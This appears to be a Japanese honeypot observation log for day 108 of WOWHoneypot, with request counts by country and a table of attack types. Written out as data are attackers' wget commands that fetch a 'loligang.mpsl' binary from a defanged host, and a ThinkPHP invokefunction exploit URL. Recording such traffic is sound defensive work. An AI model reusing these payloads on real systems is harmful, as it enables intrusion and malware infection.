WOWHoneypot観察(108日目)
2019/07/02(火)
トータルは3681件です。
ハンティングログは以下です。
89.115.102[.]167 wget+hxxp[:]//ardp[.]hldns[.]ru/loligang.mpsl |
89.115.102[.]167 wget+hxxp[:]//ardp[.]hldns[.]ru/loligang.mpsl |
9.59.87[.]111 wget+hxxp[:]//ardp[.]hldns[.]ru/loligang.mpsl |
www.virustotal.com
www.virustotal.com
IPのロケーション別の件数は以下です。
ブラジル | 2091 |
アメリカ | 1556 |
中国 | 7 |
イラン | 3 |
ポルトガル | 3 |
エクアドル | 3 |
トルコ | 2 |
ポーランド | 2 |
エストニア | 2 |
オランダ | 2 |
イギリス | 1 |
フィリピン | 1 |
インド | 1 |
インドネシア | 1 |
ネパール | 1 |
セントクリストファー・ネイビス | 1 |
ウクライナ | 1 |
アルゼンチン | 1 |
シンガポール | 1 |
バングラデシュ | 1 |
件数 | 概要 | リクエスト |
---|---|---|
3620 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
37 | アクセス | GET / |
3 | Linksys ルータの E シリーズの脆弱性を狙った通信 | POST /tmUnblock.cgi |
2 | phpMyAdminの調査 | GET /admin-scripts.asp |
2 | ThinkPHPの脆弱性を狙った通信 | POST /TP/public/index.php?s=captcha |
2 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
2 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php |
2 | 不正中継の調査 | CONNECT www.baidu.com:443 |
1 | SpringDataCommonsの脆弱性を狙った通信 | POST /users?page=&size=5 |
1 | 不正中継の調査 | HEAD hxxp://123.125.114.144/ |
1 | 調査 | HEAD / |
1 | 不正中継の調査 | GET hxxp://www.ip.cn/ |
1 | 不正中継の調査 | GET hxxp://www.gigablast.com/?rands=_346521705629624224634400 |
1 | 不正中継の調査 | GET hxxp://www.epochtimes.com/ |
1 | 不正中継の調査 | GET hxxp://www.baidu.com/?rands=_1812378972819723084757040 |
1 | 不正中継の調査 | GET hxxp://www.baidu.com/ |
1 | アクセス | GET /favicon.ico |
1 | phpのWebShell設置の調査 | GET /acadmin.php |
1 | 不正中継の調査 | CONNECT www.google.com:443 |